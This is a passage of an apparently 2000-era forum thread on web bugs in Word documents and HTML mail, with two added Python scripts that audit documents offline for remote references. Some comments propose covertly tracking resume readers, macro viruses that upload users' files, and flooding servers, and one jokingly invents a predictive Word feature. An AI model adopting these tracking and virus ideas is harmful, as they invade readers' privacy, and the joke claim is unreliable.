    By the way, this exploit hasn't been fixed in Mozilla's mail/news client yet.
    Bugzilla bug 28327: "No server hits at HTML mailnews reading - privacy" (major, M18, nsbeta3-)

    --
    The shareholder is always right.
  11. Exactly by GMontag · · Score: 3

    If I distributed an HTML document which had references to images or other objects on some website, every user opening that HTML document would cause an access to that web site.

    And if you read *any* document with a ref to an outside object (like a one pixel .jpg) with *anything* that is web aware the exact same thing will happen.

    However, if you read the document in Wordpad or some other text only program you can avoid the effect. Makes for some pesky reading around markup and junk, but you will see the references to the web too.

    Visit DC2600

    1. Re:Exactly by British · · Score: 1

      You could always view the file in another app, like Quick View Plus. That program reads Word documents but doesn't access the Internet.

  12. Re:Innovative Solution by excesspwr · · Score: 2

    Don't forget Excel and the rest of em...

  13. What I'd like to know is by ch-chuck · · Score: 3

    what are those curious little dots that appear and disappear on /. as the page loads, like right above the banner ads?? Are we being web-bugged even as we talk about it?? :))

    However, looking at page source it looks like something to do w/ pagecount, but you got us wondering about any image w/ WIDTH=1 HEIGHT=1

    --
    try { do() || do_not(); } catch (JediException err) { yoda(err); }
    1. Re:What I'd like to know is by jamiemccarthy · · Score: 5
      We get this every so often. They're pagecounters, not web bugs. My traditional response is here.

      Jamie McCarthy

      --

      Jamie McCarthy
      jamie.mccarthy.vg

    2. Re:What I'd like to know is by harmonica · · Score: 2

      In addition to the other response (image == web counter), 1 x 1 pixel images are also used for web page layout. It is (or was, at least) the only way to get certain things (like precise alignment) done in HTML. IIRC, CSS solves at least some of the problems.

    3. Re:What I'd like to know is by tealover · · Score: 3

      I don't understand this. Why do you need to count pages based on the image? You have the damn web logs !! Why can't you just analyze the web logs? Your traditional response is lacking.

      I'm sure you won't respond to this because you never respond with anything more than your obligatory response.

      --
      -- You see, there would be these conclusions that you could jump to
    4. Re:What I'd like to know is by Ravagin · · Score: 1

      CSS does solve a lot of these problems; web design is much easier with CSS. Or rather, it would be if you could trust every browser to render it the same way (not to mention implement the standards right). [/rant][/ot]

      Anyway, we only see these little graphics on /. because the browser frames the image before it has finished loading it, and then only because of the black background. In a white Word document... well, there's no way to tell.
      -J

      --

      Karma: T-rexcellent.

    5. Re:What I'd like to know is by great+throwdini · · Score: 2
      In addition to the other response (image == web counter), 1 x 1 pixel images are also used for web page layout. It is (or was, at least) the only way to get certain things (like precise alignment) done in HTML.

      Typical tired response is that images of such dimensions for pixel-perfect placement is usually (these days) done to get around Netscape not honoring table cell height and widths for cells lacking content -- workaround here is to use the proprietary Netscape SPACER tag in place of images for pixel-perfect layout.

      Tired response #2 is that this is not quite the same thing as a 1x1 buglet, as the dimensions involved are those *represented in the HTML* and not the *actual dimensions* of the linked image. In order to know the latter, the client/recipient would have to download the image in question -- instant logging activity. To effectively block buglets in advance, you would have to know that it is a buglet (1x1 dimensions) by looking at the markup HEIGHT and WIDTH hints and guessing that the image(s) in question are buglets before making the request for them.

      Unless the pixel-perfect layout you seek is in nice 1x1 chunks -- not a 1x1 transparent GIF stretched using HEIGHT and WIDTH to arbitrary dimensions -- the level of identity between 1x1 web bugs and your general purpose 1x1 shim image cannot be ascertained without requesting the image and verifying its dimensions.

      Of course, the web bug functionality is probably better served by using a lightweight, "real" image (for example, a closing horizontal rule or company logo) and not something as obvious as a 1x1 graphic pasted on to the end of a document, page, or HTML mailing
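
An added example, not part of any comment in this thread: the comment above points out that HEIGHT and WIDTH hints are only a guess and that the request itself is what gets logged. The Python below audits a saved HTML document offline, without fetching anything, and reports every image reference that would contact a server, marking third-party hosts and 1x1 hints. The sample document, its host names and all function names are constructed for illustration.

```python
import re
from dataclasses import dataclass
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample document; every host name is a placeholder.
SAMPLE_HTML = """
<html><body>
<p>Quarterly report</p>
<img src="logo.gif" width="120" height="40">
<img src="http://tracker.example.net/b.gif?doc=1234" width=1 height=1>
<IMG SRC="http://images.example.com/rule.gif" WIDTH="400" HEIGHT="2">
<img src="//cdn.example.org/shim.gif" style="width:1px;height:1px">
<img src="http://docs.example.com/pagecount.gif" width="1" height="1">
</body></html>
"""

_PIXELS = re.compile(r"^\s*(\d+)\s*(?:px)?\s*$", re.I)


def _attr_pixels(value):
    """Declared size in pixels, or None if absent or relative (e.g. 50%)."""
    m = _PIXELS.match(value or "")
    return int(m.group(1)) if m else None


def _style_pixels(style, prop):
    """Size for `prop` taken from an inline style attribute, or None."""
    m = re.search(r"(?:^|;)\s*%s\s*:\s*(\d+)\s*px" % prop, style or "", re.I)
    return int(m.group(1)) if m else None


@dataclass
class ImageRef:
    src: str
    host: str            # empty for relative (local) references
    remote: bool         # rendering the document contacts `host`
    third_party: bool    # host differs from where the document came from
    tiny_hint: bool      # markup declares the image as 1x1 or smaller
    carries_query: bool  # URL has a query string that could hold an ID


class _ImgCollector(HTMLParser):
    def __init__(self, document_host):
        super().__init__()
        self.document_host = (document_host or "").lower()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = dict(attrs)  # HTMLParser lower-cases tag and attribute names
        src = (a.get("src") or "").strip()
        if not src:
            return
        parts = urlsplit(src)
        host = (parts.hostname or "").lower()
        w = _attr_pixels(a.get("width"))
        h = _attr_pixels(a.get("height"))
        if w is None:
            w = _style_pixels(a.get("style"), "width")
        if h is None:
            h = _style_pixels(a.get("style"), "height")
        remote = bool(host)
        self.refs.append(ImageRef(
            src=src,
            host=host,
            remote=remote,
            third_party=remote and host != self.document_host,
            tiny_hint=w is not None and h is not None and w <= 1 and h <= 1,
            carries_query=bool(parts.query),
        ))


def audit_images(html, document_host=None):
    """List every <img> reference. document_host=None means the document
    was opened from disk, so any remote host counts as third party."""
    collector = _ImgCollector(document_host)
    collector.feed(html)
    collector.close()
    return collector.refs


def hosts_contacted(refs):
    """Hosts that would log a request when the document is rendered,
    whatever size the image claims to be."""
    return sorted({r.host for r in refs if r.remote})


def likely_bugs(refs):
    """Third-party images declared as 1x1: a guess from the hints only,
    since real dimensions are unknown until the image is requested."""
    return [r for r in refs if r.third_party and r.tiny_hint]


if __name__ == "__main__":
    for ref in audit_images(SAMPLE_HTML, document_host="docs.example.com"):
        print(ref)
```

The list from `hosts_contacted` is the one to feed a blocking proxy or hosts file, since a full-size logo on a remote server is logged just as a 1x1 image is.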

    6. Re:What I'd like to know is by Tarnar · · Score: 2

      Gee.. Perhaps because images.slashdot.org isn't slashdot.org? It makes analysis of the weblogs easier if you were to shut up and think. Consider the following:

      The crew wants to count the page hits. How can you do that? Every time a main page is generated by the Perl? Bzzt, that doesn't work, way too expensive. This place serves more pages/min than I'd ever care to count, and I damn well wouldn't want a script counting it for me every time it's used.

      The main page is dynamic too, so you can never be sure how many images will be loaded, so there goes analysis through that means.

      Beyond that, just counting the number of hits against the '/' isn't accurate because of incomplete page loads, etc. If you put a small image in there, chances become that if that image is loaded, the rest of the page was too.

      Bang, you can suddenly count, far more accurately, the total number of completed page loads. It's a totally controlled variable. It is appended to the logs by the web server, not by some script. What could be better?

      Now, this is all speculation, but I put this together in my head after no less than 5 minutes of thinking. Maybe you should try that too. Besides which, they are images loaded from /.'s servers, so how could they possibly be malicious?? It's their page. If they want to put 1x1 images after every third word, it's their prerogative to do so.

      So even if they have no reason to be there, that's no reason, not a bad reason. Logically, there can't be a bad reason.

    7. Re:What I'd like to know is by tealover · · Score: 1

      bullshit.

      Malda has admitted that those "web bugs" are there at Andover's behest. I bet the slashdot crew isn't even administering that box. Who the hell knows what the Andover people are doing.

      Just because you're a willing lemming, don't assume that the rest of us are. All I want is an explanation from slashdot. Not some flippant response from Jamie. And certainly not a response from a 2 bit bum like you.

      --
      -- You see, there would be these conclusions that you could jump to
    8. Re:What I'd like to know is by Tarnar · · Score: 2
      Malda has admitted that those "web bugs" are there at Andover's behest. I bet the slashdot crew isn't even administering that box. Who the hell knows what the Andover people are doing.
      Link please, or I'll be forced to call bullshit on you. Besides which, do you honestly have a better explanation than me? You can't call it a 'web bug' because the definition of a 'web bug' is something that is stored on a different site than the page in question.

      By your logic, any webpage with a 'counter image' or any image whatsoever has 'web bugs' in it. As I said, if I was managing /., that would be the smartest way to keep a webcounter. A totally controlled variable that can be easily grepped out of the logs.

      And look, I managed to make a coherent argument without resorting to name-calling. You still have yet to do that. Sod off.
    9. Re:What I'd like to know is by tealover · · Score: 1

      Here's your link. It was actually by Hemos.

      the definition of a 'web bug' is something that is stored on a different site than the page in question.

      Says who? Some so-called "expert". First of all, the term "web bug" is stupid. Anything that allows tracking is suspect in my book. I don't care what server it happens on. All I care is who administers the server and what they do with the data.

      if I was managing /., that would be the smartest way to keep a webcounter. A totally controlled variable that can be easily grepped out of the logs.

      That's your opinion. I disagree.

      And look, I managed to make a coherent argument without resorting to name-calling. You still have yet to do that. Sod off.

      Too tough for you in here? There are other, nicer forums for you.

      --
      -- You see, there would be these conclusions that you could jump to
    10. Re:What I'd like to know is by Tarnar · · Score: 2

      Well, the link through the link didn't work, but I'll take the quote at face value. Regardless though, this still takes us back to square one.

      And actually, you have what you were whining about in your earlier posts. That was an explanation by the Slashdot crew, congratulations, you have proven exactly nothing.

      Anything that allows tracking is suspect in my book.

      You should probably get the hell off the Internet then. Websites, FTP sites, IRC servers, NNTP servers, they almost all track IP usage. You don't want privacy, you want unaccountability. I mean, yeah, your argument would hold up if those were Doubleclick webbugs that were tracking you from site-to-site but they aren't. They're a local image being loaded on the page.

      I still am yet to understand what the basis behind your argument is. You've gotten your explanation from Slashdot. You know that your IP is being logged regardless of the presence of that 1x1 GIF.

      If, despite all this, you still have a problem with a local GIF on a local server, then email Andover and ask for their privacy policy. You told me to find another forum, maybe you should consider taking yourself to another one as well. If you can't trust Andover and Slashdot, why the hell are you still here, whining?

  14. Not just the logging, though by FascDot+Killed+My+Pr · · Score: 2

    The logging is bad enough (just because HTML does it doesn't make it OK). But combine that with the already known scripting "features" of Word and you have a recipe for disaster. Everyone who has Word installed has a generalized scriptable app open to the Internet. That's a big problem.
    --
    Linux MAPI Server!
    http://www.openone.com/software/MailOne/
    (Exchange Migration HOWTO coming soon)
    1. Re:Not just the logging, though by STSeer · · Score: 1

      HTML has scripting too, and even java

  15. Preventing this by FIGJAM · · Score: 3

    When I am in Vindoz I use ZoneAlarm as a firewall which asks me if I want an application to access the Internet when an attempt is made. I have never had any Office component attempt this but I like knowing if and when Word or anything else tries...

    --
    Do your best, hope for the best, suspect the worst.
    1. Re:Preventing this by the-banker · · Score: 3

      And you would never know if word tried, since it is the Internet Explorer component accessing the net, which I am sure you have granted access. Being a "necessary component of the OS" (their words, not mine) it will always be available, and chances are your firewall will never pick it up.

    2. Re:Preventing this by indiigo · · Score: 1

      That wouldn't work. You've most likely already had IE set up to work, which Word uses already. ZoneAlarm would just see it as another IE request. Unless you are really strict, which I doubt, because ZoneAlarm can get really, really annoying.

      --
      fslg503-985-8686503-985-8686503-985-8686503-985-86 8650 3-985-fdsg8686503-985-8686503-985-8686503-9
    3. Re:Preventing this by stg · · Score: 1

      And you would never know if word tried, since it is the Internet Explorer component accessing the net, which I am sure you have granted access. Being a "necessary component of the OS" (their words, not mine) it will always be available, and chances are your firewall will never pick it up.


      Have you tested it? I just did, and on Word 97, WINWORD.EXE was the process requesting net access. On ZoneAlarm, you get a question if you want to let it access the net (yeah, right).

      That's probably because the IE functions are used as an in-process OLE server, thus the process requesting access is Word, not IE.
  16. Re:Innovative Solution by dattaway · · Score: 2

    Four words: Don't use Microsoft Word.

    That doesn't bode well with Bill Gates' World Domination Plan (tm).

  17. Re:This isn't much different than Web Pages alread by phil+reed · · Score: 2
    Except that people don't expect word processing documents to be like web pages.

    Has anybody checked to see if the same thing happens in Excel?


    ...phil

    --

    ...phil
    "For a list of the ways which technology has failed to improve our quality of life, press 3."
  18. And of course HTML emails by zlite · · Score: 3

    And they're *not* viewed in a web browser. Indeed, it's a good way to get an "opened" receipt when you send email (even if they choose not to acknowledge the usual "receipt requested" flag): embed a graphic from your own site and their client will automatically fetch it when they open the message. Cookies, too.

    Clever, but not new. Why the big MSFT-is-evil hype about this?

    1. Re:And of course HTML emails by david+duncan+scott · · Score: 1

      One of the reasons I don't use HTML mail readers...

      --

      This next song is very sad. Please clap along. -- Robin Zander

    2. Re:And of course HTML emails by Rude+Turnip · · Score: 1

      This is why I like Mail-It for BeOS. By default, all messages are shown as plain text, even the HTML tags are visible. If you really want to see a message as HTML formatted, then you can change the "view" to HTML.

      To kick out the web bugs, just view the message as plain text and edit out any suspicious tags.

    3. Re:And of course HTML emails by Tackhead · · Score: 2
      >"And of course HTML emails" [ ... clever, but not new, why the big MSFT-is-evil hype? ]

      This reminds me of a .sig I've loved since the day I saw it:

      "The PROPER way to handle HTML postings is to cancel the article, then hire a hitman to kill the poster, his wife and kids, and fuck his dog and smash his computer into little bits. Anything more is just extremism."

      - Paul Tomblin, in the Monastery

      If I wanted a web browser to view something, I'd use a web browser. If I wanted a word processor, I'd use... well, actually, I'd use anything but Word. But you get the idea.

      Why the big "MSFT is evil" hype?

      Because it's yet another case of MSFT assuming that the entire world is a Microsoft Orifice shop, and that the entire WWW is limited to your corporate intranet.

      Look at the past few years of MSFT's design decisions - they all make sense when you realize that the only use MSFT has for TCP/IP is to share and link data from one Office LAN user to another LAN user, security and privacy issues - as always at MSFT - are an afterthought.

      The M$Orifice luser in the cube farm is the only user who(se manager) pays for the product; as a necessary consequence of this, most MSFT design decisions are made with this usage profile in mind (another good example, "zones" of security in IE). When every host can be assumed to be on the corporate LAN (of course, www.microsoft.com is considered part of this LAN - Windows Update being another good example) and is considered "trusted", much of what MSFT does makes much more sense.

      It's just as wrong, of course - I'm just saying that it makes sense if you view it from their (rather myopic) perspective.

    4. Re:And of course HTML emails by j03+h4x0r · · Score: 1

      Well, to be honest I'm not one of you Open Source dudes. I'm not against corporate software and I'm not out of hand, against Microsoft.

      However, at least with Open Source a "feature" like this wouldn't have been hidden for such a long time. Kind of makes one wonder what other "features" are included with any software product.

      --
      Penis bird industries (Nasdaq sympol PNIS)


      <O
      ( \
      X
      8===D
  19. Word Macro Virus meets Internet Cache by Cardinal · · Score: 1

    I can see it now. A word macro virus that uploads the contents of everybody's c:\mydocu~1 to a central web server, and archives and indexes it all, so that a casual web surfer can wander through the personal documents of tens of thousands of hapless MSOffice users.

  20. This is different... by jamused · · Score: 1

    ...in that when you open a word processing document, you don't usually think that you're "doing something on the Internet." You especially don't think that you are communicating and setting cookies via invisible images.

  21. Hmmm... by Frizzle+Fry · · Score: 2
    Props to their CTO Richard M. Smith

    Yes, good job RMS.

    Care about freedom?

    --
    I'd rather be lucky than good.
  22. Another interesting feature... by Anonymous Coward · · Score: 2
    There is also a feature built into Microsoft Word, which combines with these user tracking facilities. It is called the Predictive Artificial Neural Network Tracking System, and as the name suggests, it is a neural network built into Word. Once this ANN has harvested a sufficiently large list of people who have opened your Word document, it is actually able to predict who will open your document in the future - it is even able to predict when people you've never met before will open the document.

    Thus, this technology gives you the possibility to predict unauthorised access to your documents before it actually happens, thus enabling you to apprehend and punish the criminals _before_ they commit the crime. This technology is intended to be used in conjunction with the DMCA to prevent the unauthorised disclosure of confidential electronic documents. Slightly creepy, but very interesting technology nevertheless.

  23. Re:I have just one thing to say.... by um...+Lucas · · Score: 1

    Star Office currently bites. On PC's it attempts to take over/supplement the entire OS. One start menu might be annoying, but two are just absurd. Plus the fact that it becomes your default web browser, and I haven't found a way to circumvent that as of yet... Even on Solaris, the thing is slow as molasses... and no, it's not the "slowaris" effect. I tried running it on a dual cpu 400 MHz machine with no load, and it still took ages to even launch. everything else, even netscape, was much more responsive than Star Office could even hope to be...

  24. Inverted Firewall? by Anonymous Coward · · Score: 1

    I swear MS's VC++ help system also periodically hits the net. Does anybody have software to monitor outgoing connections? Sort of an inverted firewall? I know the net* group of utilities (netstat, etc?) will let you look at current connections, but what I want is programmatic access to this stuff. I want the ability to 1) monitor, 2) deny, and 3) flood the target (appropriate for MS, I think. they want info, let's give it to them and choke NT IIS). Something low level, like WinDump's NDIS driver, or perhaps a TCP/IP Service Level Provider (or whatever MS calls that additional TCP/IP layer). Hell, perhaps just a low tech netstat spawn and scrape the output into a pipe and parse it... ugh... I for one do not approve of these programs promiscuously hitting the net. But I ramble... say, it's time for a Coke, I think.

    1. Re:Inverted Firewall? by java.bean · · Score: 1

      I don't have the documentation handy, but if you have MSDN, I specifically remember MS building the ability to do this into the TCP/IP stack that comes with Windows 2000. If I think of it later I'll post more information. (You need to be a C/C++ programmer too. :-) )

      --jb
  25. Who's reading my resume? by spudboy · · Score: 5

    Here's an actual reason to send your resume in Microsoft Word format -- you can track who at the company is reading it and when. Put a bullet graphic on your web site, hold your nose and go to Kinko's to save your resume in Microsoft Word format, and sit back and track it.

    "Hi, this is Bob. I'm applying for the Internet security position, and I'm calling about my resume which you're looking at right now on your Macintosh." Freak them out but get the job.

    Mapping IP addresses to user names and phone extensions is a simple matter of social engineering and common sense.

    --
    -- Real free software sites don't use GIFs.
    1. Re:Who's reading my resume? by Fas+Attarac · · Score: 2

      Most people (I would hope) would send their resumes in formats their potential employer suggests and/or states that they accept. If they don't specify, fax and/or mail it. If they say "electronic", I'd e-mail them a text copy with a URL to an HTML copy. If they say "Word" (and some do), Word is what they'll get.

      Major companies nowadays are requesting only textual resumes. This way they are light on space, can be easily searched and easily integrated in the company's internal resume system (assuming they have one), and people within the company looking for applicants have to do less work and can deal with a standardized document format. It's rare that a company will request a Word format, but it happens.

      If someone is blindly sending you a resume in Word, there are other reasons to reject it that don't necessarily have anything to do with the applicant's skills at system security.

    2. Re:Who's reading my resume? by Fas+Attarac · · Score: 2

      You're making the assumption that the person doing the tracking automatically knows the identity of the person doing the reading. The only thing these "bugs" can tell the "bugger" is the IP address of the person reading the document. I guess you can insert some sort of unique ID into the resume so that you can tell what version of the document they're reading (sending a slightly different version of the document to each person you originally send it to). Could be good for detecting information leaks, but isn't very useful for figuring out the identity of the person actually reading the document, unless you have the ability of going to the ISP and retrieving the identity from them, or if perhaps you have some cookies already set up with identifying information. Either way, that's a lot of if's.

      Generally speaking, downloading a Word document from the web only nets the malicious user your IP address and/or hostname, nothing more than what they would get if you browsed an "evil" web page at their web site.

    3. Re:Who's reading my resume? by hawkfish · · Score: 1

      This could be great for reverse engineering bottom feeders.

      I mean headhunters.

      --
      You will not drink with us, but you would taste our steel? - Walter Matthau, The Pirates
    4. Re:Who's reading my resume? by sjames · · Score: 2

      "Hi, this is Bob. I'm applying for the Internet security position, and I'm calling about my resume which you're looking at right now on your Macintosh." Freak them out but get the job.

      Nahh, be creative! Have a macro do some digging first. "Hi, this is Bob. I was applying for the Internet security position at your company. You read my resume yesterday. Anyway, I'd like to apply for the job sitting on my ass at home for $50,000 a year. By the way, who's that Lola chick you keep emailing. How'd you talk your wife into letting you see her?"

      PHB: Your hired!

    5. Re:Who's reading my resume? by ArsonSmith · · Score: 2

      mv resume.txt resume.doc

      has always worked for me. Word opens it up without so much as a warning or complaint

      --
      Paying taxes to buy civilization is like paying a hooker to buy love.
    6. Re:Who's reading my resume? by Fas+Attarac · · Score: 2

      I was speaking about major companies. The kind that are processing dozens if not hundreds of resumes per day. You are correct in that most small firms are going to be reading your resume in either a nice printed format or in Office, so it might be logical for them to ask for it in Word.

      Large companies, on the other hand, can't afford to do this with every applicant. Resumes are stored in a database in textual form, and when some group within the company needs a particular skill set, the resumes are searched, pulled and delivered, all in a standard format. This facilitates quick and easy comparisons of skills. When you're at this level, they could really care less how presentable your resume looks. They're interested in the contents.

      I for one wouldn't mind seeing an XML resume format. One that had enough flexibility so as to be searchable by skills, past experience, and with the ability to be styled via XSL or CSS so that it can be printed and look just as good as if it were done professionally in Word.

  26. Tantamount to stealing? by merlix · · Score: 1
    Isn't this tantamount to stealing?

    If the bug fires up the phone line to your ISP, it's using phone charges (and possibly ISP charges) without your permission.


    Ahem.

    1. Re:Tantamount to stealing? by mrfiddlehead · · Score: 1
      If the bug fires up the phone line to your ISP, it's using phone charges (and possibly ISP charges) without your permission.

      Don't laugh ...

      I'm going to sue Microsoft for the cost, 97 - hey there's no cents symbol on my keyboard, when did that happen - cents, of dialing up my ISP and contacting the owner of that document I opened. And to make matters worse, I did it 370,000 times so it adds up.

      Bill, make out a cheque for $500,000 US and we'll call it even.

      Thanks

      --
      :wq
    2. Re:Tantamount to stealing? by Enzondio · · Score: 1
      How exactly is it going to "fire up the phoneline to your ISP" without your permission? If you're not connected it'll prompt you to dial up just like any other application (assuming you have your system set up that way).

      I can only assume you didn't read the article.

    3. Re:Tantamount to stealing? by paRcat · · Score: 1

      It's possible to have dial-up networking work without asking for information. Assuming that you've used it at least once and told it to save your username and password, it's basically an automatic thing. You would still see it dialing, but that doesn't make it a non-issue.

    4. Re:Tantamount to stealing? by jcrowe · · Score: 1

      I think that the real advantage of this bug would be directed at those with "always on" connections, that way the ip addy in the server logs will be something other than a dynamically generated isp ip. You also have to remember that the general public won't understand this bug even after it's carefully explained to them.

    5. Re:Tantamount to stealing? by dead_penguin · · Score: 1

      Dial-up internet access? Does anyone still do that? That's like, sooooooo 1990's!

      (better read all that with a big fat ;) !!!)

      --

      It's only software!
  27. Junkbuster will work here by java.bean · · Score: 2

    Word will use Internet Explorer to do this, which also means it will use IE's proxy settings. Just another good reason to use Junkbuster. Of course, there's a very small chance the host images are coming off of are actually in your scookie.ini.

    --jb
    1. Re:Junkbuster will work here by kensail · · Score: 1

      Actually the way to make this work/(not work?) is to set a proxy configuration in IE that DOES NOT work. Then IE will gack and not find the proxy. This means that you need to use netscape or mozilla as your regular browser.

    2. Re:Junkbuster will work here by Anonymous Coward · · Score: 1

      It's not IE doing the connecting, according to Zone Alarm it is Word itself, same with clicking on an html link in Word. It does use the IE proxy settings though.

  28. Personally... by tealover · · Score: 3

    I hate the term "web bug". Actually, I'm more offended at the people who come up with these stupid terms rather than the potential abuse they bring about.

    I propose that we direct our energies to tracking and hunting down people who come up with these terms and sending them to Texas. I'm sure they'll know what to do about them down there.

    --
    -- You see, there would be these conclusions that you could jump to
    1. Re:Personally... by dublin · · Score: 2

      Yup, we do. Does "Git a rope!" mean anything to you?

      (For the clueless, this is a reference to a famous Pace Picante Sauce commercial - a group of cowhands on the trail are looking at the salsa provided by their new "cookie" and discover it's not the good stuff from San Antonio, but is made in "New York City??!!". The lead cowpoke turns to another and orders, "Git a rope!", as Cookie gulps and realizes he's about to get stretched. The only reason I bother to explain this is for non-US readers...)

      --
      "The future's good and the present is nothing to sneeze at." - Roblimo's last ./ post
  29. Now part of this I don't have a problem with by Kierthos · · Score: 2

    See, I'm not one of those "all information deserves to be free" geeks who thinks that it is perfectly okay in all cases to spread copyrighted information all over the place. So I can support the concept of using this to track copyrighted documents in most cases.

    However, I can't stand the idea that outside of that limited arena that anyone can track the documents I read if they have any of these embedded graphics files. I have enough problems with cookies tracking how often I check certain web sites. This is intolerable. At the very least, it's an invasion of privacy, and the simple matter of 'turning off cookies' falls on deaf ears as most of the End Users won't know about this invasion of privacy or the need to turn off cookies.

    In any case, Microsoft is coming out of this looking like the bad guys again, and they _still_ can't differentiate between OS's and apps... :P

    Kierthos

    --
    Mr. Hu is not a ninja.
  30. Amen by DiningPhilosopher · · Score: 1


    Precisely. I was going to post this myself. If a Word document I opened caused Word to try to access a website, ZoneAlarm would tell me so, and I'd respond with a quick click on the "HELL NO" button.

    http://www.zdnet.com/downloads/partners/zonealarm/download.html

    --
    /* The beatings will continue until morale improves. */
  31. Not that I'm encouraging anyone to do this, but, by tcd004 · · Score: 1
    You know what would truly make a virus destructive.

    Design a macro virus that is time activated, but don't be stupid and set it off two weeks after you distribute it.

    Send that puppy out to propagate, and set it to infect a full year later. By that time it would be on every computer in the universe. Kind of like the AOL install.

    just rambling.

    tcd004

  32. Word for Unix by Jeffrey+Baker · · Score: 4

    ln -s `which strings` /usr/local/bin/word

    1. Re:Word for Unix by chamont · · Score: 1
      Actually, that works pretty well. Don't forget 'word | less' for those really long documents.

      Monty

    2. Re:Word for Unix by devin · · Score: 1


      Even better than that: antiword.
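An added example, not part of the thread: `strings` prints only 8-bit runs by default, while Word files can also store text as 16-bit characters, so a check for remote references has to look for both. The Python sketch below scans raw bytes for http/https/ftp URLs in either encoding and groups them by host; the function names and the sample bytes are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Characters allowed inside a URL run: printable ASCII minus quotes/brackets.
_CH = rb'[^\x00-\x20"<>\x7f-\xff]'

# URL stored one byte per character.
URL_8BIT = re.compile(rb"(?:https?|ftp)://" + _CH + rb"+", re.IGNORECASE)

# Same URL stored as UTF-16LE: every ASCII character is followed by \x00.
URL_16LE = re.compile(
    rb"(?:h\x00t\x00t\x00p\x00(?:s\x00)?|f\x00t\x00p\x00)"
    rb":\x00/\x00/\x00(?:" + _CH + rb"\x00)+",
    re.IGNORECASE,
)


def find_remote_refs(data):
    """Return (offset, encoding, url) for every URL-looking run in the bytes."""
    refs = []
    for m in URL_8BIT.finditer(data):
        refs.append((m.start(), "8-bit", m.group().decode("ascii")))
    for m in URL_16LE.finditer(data):
        refs.append((m.start(), "utf-16le", m.group().decode("utf-16-le")))
    return sorted(refs)


def hosts_contacted(data):
    """Group the URLs by host and note whether any of them carries a query
    string, which is where a per-copy identifier would ride."""
    hosts = {}
    for _, _, url in find_remote_refs(data):
        try:
            parts = urlsplit(url)
            host, query = (parts.hostname or "").lower(), parts.query
        except ValueError:          # malformed authority, keep it visible
            host, query = "", ""
        entry = hosts.setdefault(host, {"urls": [], "has_query": False})
        entry["urls"].append(url)
        entry["has_query"] = entry["has_query"] or bool(query)
    return hosts


# Constructed sample bytes (not a real Word file): one 8-bit URL in quotes
# and one UTF-16LE URL, separated by filler.
SAMPLE_DOC = (
    b"\xd0\xcf\x11\xe0" + b"\x00" * 8
    + b'"http://tracker.example/bug.gif?id=42"'
    + b"\x00" * 3
    + "http://www.example.org/logo.png".encode("utf-16-le")
    + b"\x00\x00"
    + b"plain text, no links"
)

if __name__ == "__main__":
    for offset, encoding, url in find_remote_refs(SAMPLE_DOC):
        print(f"{offset:6d}  {encoding:8s}  {url}")
    for host, info in hosts_contacted(SAMPLE_DOC).items():
        print(host, "query string present" if info["has_query"] else "")
```

A hit only shows that the file names a remote resource; whether the application fetches it on open depends on how the reference is used inside the document.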

  33. Software that requires net access during install... by Anonymous Coward · · Score: 1

    This is only the beginning. Expect to see software checking its "CD key" over the internet so pirated copies could be remotely and automatically disabled. Or browser plug-ins to upload your surfing habits. MPEG players to report what you're playing. News reader software to ship the subject lines of what you read off to HQ for analysis. And expect software to refuse to run without at least a periodic net connection (like DIVX or satellite TV systems).

  34. not strictly a Microsoft problem by Pink+Daisy · · Score: 2

    I know that a lot of people enjoy bashing Micro$oft when a hole like this turns up in their products, but just for perspective, this will apply to any application that has sufficient integration. And as far as that goes, even the Privacy Foundation says that the integration is potentially useful and they recommend keeping it there. Just wait a little while; integration and component reuse is a very important feature of MS Windows, but Linux is catching up quickly. Soon we'll have this sort of problem also.

    --

    If you are modding me down because you disagree with me, use the "Flamebait" category, not the "Troll" one.
    1. Re:not strictly a Microsoft problem by jamused · · Score: 1
      You say it will apply to any application that has sufficient integration, I say it will apply to any application that has insufficient security. It would take nothing in particular by way of design to have the word processor default to not trying to pull down non-local images when you open a local document, and to not set cookies. Or even to ask you when the document tries to do so.

      As a Linux user, I'm certainly never going to install, let alone use, an integrated application that's designed with such a cavalier attitude towards security. Non-local communication should be the exception, not the norm, and should never occur invisibly.

  35. Re:This isn't much different than Web Pages alread by catkinson · · Score: 2
    According to the message I received from Declan McCullagh on the politech list which came directly from Richard M. Smith.
    A demonstration "bugged" document for Word 97 and Word 2000 has been set up at:
    http://www.privacycenter.du.edu/demos/bugged.doc
    We also found that Excel 2000 spreadsheet files and PowerPoint 2000 slideshows can be "bugged" in the same manner.


    So yes, this would be applicable to some other MS apps. My solution, though I don't know if it will work well, would be to continue to use a program which asks me if I want other programs to access the internet. I'm pretty sure that it would catch word before it could get the image from a server. However, I can't guarantee that, this is Microsoft after all, and we know how open their platform is :)
  36. Emacs too by Anonymous Coward · · Score: 3

    GNU emacs can do all of these things too (including harboring document virii). What's the diff?

    1. Re:Emacs too by psicE · · Score: 1

      None. Emacs also doesn't know the difference between a document, app, and OS. The difference is most Un*x advocates manage to overlook this fact...

      I use joe, I'm safe.

      Speaking of which, does anyone know an alternative to MS Word that uses .doc or .rtf files and supports footnotes? That's the one feature that's missing from all the clones.

    2. Re:Emacs too by pohl · · Score: 3

      Hmmm...I open a document, and it contains some emacs lisp code...how does this code become executed automatically without me instructing emacs to do so? I know that I can use M-x eval-buffer, or select a region and use M-x eval-region -- but in order to be analogous to a Word macro virus, wouldn't emacs have to automatically execute the contents of the file without my direction to do so? If this is the case, point this feature out to me. I'm curious.

      --

      The "cue the foo posts in 3, 2, 1..." posts will commence with no subsequent foo posts in 3, 2, 1...

    3. Re:Emacs too by ink · · Score: 4
      GNU emacs can do all of these things too (including harboring document virii). What's the diff?

      That's not true. Emacs does not execute arbitrary lisp code embedded in a document. It certainly doesn't follow hyperlinks and set up cookies transparently. You have to explicitly do all of these things.

      The wheel is turning but the hamster is dead.

      --
      The wheel is turning, but the hamster is dead.
    4. Re:Emacs too by Anonymous Coward · · Score: 2

      No, it is true. I have plenty of source code that contains a few lines of lisp code at the top that sets things like tab width. Try putting the following code at the top of a file and then opening it:

      // -*- mode: C++; tab-width: 4 -*-

      I have my emacs set to ask me about this, but not everybody does (just as not everybody has Word set to ask before macro execution). And just like Word macro questions, a lot of the remaining people blindly just hit "y"...

    5. Re:Emacs too by Anonymous Coward · · Score: 1
      That's not true. Emacs does not execute arbitrary lisp code embedded in a document.

